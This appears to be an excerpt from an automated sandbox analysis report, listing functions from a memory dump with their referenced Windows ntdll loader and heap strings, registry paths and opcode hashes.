                                                                                                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                                                                • API String ID: 0-1145731471
                                                                                                                                                                                                                                                                • Opcode ID: 91944cb6c2c4751c64df833e4976fdc2cd5fa1802c23dc5d0c74e6454b13ebbd
                                                                                                                                                                                                                                                                • Instruction ID: c2303d9e47479acbb2decae69b64f513f4c88914db7cf448da5db1722a4aa316
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91944cb6c2c4751c64df833e4976fdc2cd5fa1802c23dc5d0c74e6454b13ebbd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66B1AC75A12705CBDB25DF68C8D1B9DB7B9AF487A8F14452AE851EB7A0D730E940CF00
                                                                                                                                                                                                                                                                Function 3398330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                                                                                • API String ID: 0-2391371766
                                                                                                                                                                                                                                                                • Opcode ID: cde94d92092a8066d08dc837e1b0480fd90a72598439c216e7bc3210cd90bed2
                                                                                                                                                                                                                                                                • Instruction ID: 5d18af12d76132dff498eb005fcdb9f1b88aa99ac04d0610518f3ea5ff97dc47
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde94d92092a8066d08dc837e1b0480fd90a72598439c216e7bc3210cd90bed2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CB1BE79A04305EFE311EF54C8C1B5BB7E8FB88750F440929FA989F281DB75E8448B92
                                                                                                                                                                                                                                                                Function 338FA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                                                                                                • Opcode ID: 6e8f38be81065bdc3510e46c962b7eeac04c79992c9aa63e068a8cf07e4c64bc
                                                                                                                                                                                                                                                                • Instruction ID: ce8c25beb8a0aed1b7077540d47fd49622d1bd09d8d2f7b68ec61cc29c92801b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e8f38be81065bdc3510e46c962b7eeac04c79992c9aa63e068a8cf07e4c64bc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08A16976D01629DAEB21DB64CC88B9AB7B8EF04714F1001EAE909E7250DB359EC9CF50
                                                                                                                                                                                                                                                                Function 3399327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                                                                                                • API String ID: 0-318774311
                                                                                                                                                                                                                                                                • Opcode ID: 4781e6d9570832c491aca64fa98d364da24f2acf45c5a5e0672af6ac7d382f8b
                                                                                                                                                                                                                                                                • Instruction ID: 22df43c4a4c21c6f1a5b31746f9f7c31b74dc06247aed06a5623cea7982a138b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4781e6d9570832c491aca64fa98d364da24f2acf45c5a5e0672af6ac7d382f8b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1819D75648340EFE311CF24C881BAAB7E8FF8C790F480929F9949B291DB74D900CB52
                                                                                                                                                                                                                                                                Function 3390B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                                                                • API String ID: 0-373624363
                                                                                                                                                                                                                                                                • Opcode ID: 461dd7539942c907826ec2e162d09d1a8680cd04023a89c5e3f4be96a9bb4b79
                                                                                                                                                                                                                                                                • Instruction ID: 5962eb111f7b7d8251b1f0658f393f05faa965a58927c10db86e7133857868f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 461dd7539942c907826ec2e162d09d1a8680cd04023a89c5e3f4be96a9bb4b79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E391CD75A05359CFEB21CF94C4907AEB7B8EF053A8F184199E854AB391D778DA80CF90
                                                                                                                                                                                                                                                                Function 339DB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • TargetNtPath, xrefs: 339DB3AF
                                                                                                                                                                                                                                                                • GlobalizationUserSettings, xrefs: 339DB3B4
                                                                                                                                                                                                                                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 339DB3AA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                                                                                • API String ID: 0-505981995
                                                                                                                                                                                                                                                                • Opcode ID: 6334d34c5f50052816ee94773388f6d8d22feb2dae8a48b31143454032606163
                                                                                                                                                                                                                                                                • Instruction ID: b3c9e54c9efdf126af1c57bcb661a7414c5ee316d32105f61dca830926653df5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6334d34c5f50052816ee94773388f6d8d22feb2dae8a48b31143454032606163
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE619A72D4132DEBDB21DF54DC89B9AB7B8AB08750F4141E9E908AB250CB74DE84CF90
                                                                                                                                                                                                                                                                Function 338FF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 3395E435
                                                                                                                                                                                                                                                                • HEAP: , xrefs: 3395E442
                                                                                                                                                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3395E455
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                                                                                                                                                • Opcode ID: 2db477b0d95358205053574e5a02d26a40bbd10bac13db10e1a06ddb820cc2b8
                                                                                                                                                                                                                                                                • Instruction ID: b1c00aae7a31a525682185c18b4ebfd151cafe988d54b1ce77f0e6640b1c2f67
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2db477b0d95358205053574e5a02d26a40bbd10bac13db10e1a06ddb820cc2b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF512335A04788EFF712CBE8D884F9ABBF8EF04344F0841A5E5919B6A2D775E950CB50
                                                                                                                                                                                                                                                                Function 33921514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3396A396
                                                                                                                                                                                                                                                                • LdrpCompleteMapModule, xrefs: 3396A39D
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3396A3A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                                                                                                                                                • Opcode ID: be49c2cf59428d1ede63a540b7e9b6a1194f84878c214bed232a3ebe567b6881
                                                                                                                                                                                                                                                                • Instruction ID: 24ac94eaff15fd24c46a4b78039a6f6a0381125ae31c5182b8760e40baf5f201
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be49c2cf59428d1ede63a540b7e9b6a1194f84878c214bed232a3ebe567b6881
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD5102B4B05B49DFE721CB68C840F1A7BE8AB447A4F140194E891DB7E6DB74E810CB40
                                                                                                                                                                                                                                                                Function 339AD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 339AD792
                                                                                                                                                                                                                                                                • HEAP: , xrefs: 339AD79F
                                                                                                                                                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 339AD7B2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                                                                                                                                                • Opcode ID: 3094b3f0aef4a328f808df8345e589bba3f63bbf5d678ce58296d62198de1736
                                                                                                                                                                                                                                                                • Instruction ID: d766e5419ee658186888597c7eaf67f73bbfd04b3852221c34902017c913649b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3094b3f0aef4a328f808df8345e589bba3f63bbf5d678ce58296d62198de1736
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 945142B8100350CEF368EE2DC86477273E9DF452C6F954A8AE4D58B681EA36D847DB60
                                                                                                                                                                                                                                                                Function 339315EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33971943
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 33971954
                                                                                                                                                                                                                                                                • LdrpAllocateTls, xrefs: 3397194A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                                                • API String ID: 0-4274184382
                                                                                                                                                                                                                                                                • Opcode ID: d5e03b8c8b7264ace480d5356c28e293d3a5b05ae2ec8c00bb8e1eec99ecbbbc
                                                                                                                                                                                                                                                                • Instruction ID: 467066c8d4452c9b992e08f2788391eb60aa745f782ac5fcdce5e6d2a5884a03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5e03b8c8b7264ace480d5356c28e293d3a5b05ae2ec8c00bb8e1eec99ecbbbc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D54169B5E01309EFDB14DFA8C881AAEBBF5FF49350F048129E416A7752DB75A8018F50
                                                                                                                                                                                                                                                                Function 339332C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RtlCreateActivationContext, xrefs: 33972803
                                                                                                                                                                                                                                                                • Actx , xrefs: 339332CC
                                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context data, xrefs: 33972808
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                                                                                • API String ID: 0-859632880
                                                                                                                                                                                                                                                                • Opcode ID: 36442bcc7bfbcd501136ac4e56b1bd3da0ac6dd753d4fcb39beebd827a05ab28
                                                                                                                                                                                                                                                                • Instruction ID: 92ab7ca6fab86057142e5533ed4f1d3c6dc2adf03063bfa2b343dea057b6bad0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36442bcc7bfbcd501136ac4e56b1bd3da0ac6dd753d4fcb39beebd827a05ab28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E31F2B2A42305DFEB15CE68D8D0B9A37E8EF49760F598469FC049F292CB71D805CB91
                                                                                                                                                                                                                                                                Function 3398B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3398B2B2
                                                                                                                                                                                                                                                                • @, xrefs: 3398B2F0
                                                                                                                                                                                                                                                                • GlobalFlag, xrefs: 3398B30F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                                                                                                                                • Opcode ID: 44710df7524bd91f739bf88ed464712fac367bc5c68584a1976fc8306fb2b9c3
                                                                                                                                                                                                                                                                • Instruction ID: 9ae928467d7c3f166a16b22e09d3b26564713300aefa7cc41506ab989b8a94cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44710df7524bd91f739bf88ed464712fac367bc5c68584a1976fc8306fb2b9c3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65312FB5D0120DEEDB10DF94DC80AEEBBBCEF44784F44046AE615EB241D7749E448B94
                                                                                                                                                                                                                                                                Function 33941190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3394119B
                                                                                                                                                                                                                                                                • BuildLabEx, xrefs: 3394122F
                                                                                                                                                                                                                                                                • @, xrefs: 339411C5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                • API String ID: 0-3051831665
                                                                                                                                                                                                                                                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                                                • Instruction ID: 0ef2384e43e303364405f5f06725f799b8292a3264069bba557c8875555babfc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 823150B6D01719FBDB11DB95CC44EAEBB7DEF84654F404025E914E72A1DB30DA058BA0
                                                                                                                                                                                                                                                                Function 339885AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 339885DE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                                                                                                • Opcode ID: 837640e12625bca4aa523b1b017c493f6c4fe728a8a4c6122203b5324d6ebfaf
                                                                                                                                                                                                                                                                • Instruction ID: 88ef3ed556d4391eaddd45644923e84ee8c668fc4716c191726d2e16cc70325d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 837640e12625bca4aa523b1b017c493f6c4fe728a8a4c6122203b5324d6ebfaf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F401F73560C308DFE7217F54D844A9A3B69EFC4392F4405E8E5015F957CB21A841CBB4
                                                                                                                                                                                                                                                                Function 339151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                                                                                                • Opcode ID: 5a889632b09480af253ff8ec836f4eeb73a6e47ab755e2b6273a372de0db129d
                                                                                                                                                                                                                                                                • Instruction ID: be326cb67be3dc350336b54bec90727bb58d359ec4260340e5be9be52b61f54b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a889632b09480af253ff8ec836f4eeb73a6e47ab755e2b6273a372de0db129d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0932DEB5908316CBE720CF14C480B2EB7E9EF88794F56491EF995A7390E734D864CB92
                                                                                                                                                                                                                                                                Function 33905622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: d271b45bb7c15337c0d6b5251c84cde909f7f051180100d81999f93e5e2998fe
                                                                                                                                                                                                                                                                • Instruction ID: 4d4a78299b0bc4509c324c14bb4181892bbc6674a01c9be5e48741dde1ebf34c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d271b45bb7c15337c0d6b5251c84cde909f7f051180100d81999f93e5e2998fe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7631C17560AB06EFE755AB24CA80A8AFBB9FF447A4F044125E94187E51DB74E821CFC0
                                                                                                                                                                                                                                                                Function 3397E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                                                • Opcode ID: e5ee81fb0196aaeaa7a720cceaf828bc58bf54650b965cbb0480fa03812f4970
                                                                                                                                                                                                                                                                • Instruction ID: 2d40adf5808111f5cc818e50038c20233b2d9e3003241089b8127c3ebc73b730
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5ee81fb0196aaeaa7a720cceaf828bc58bf54650b965cbb0480fa03812f4970
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A614CB1E00309DFEB24CFA8C840AADB7B9FF48780F54406DE559EB6A1EA30D940CB50
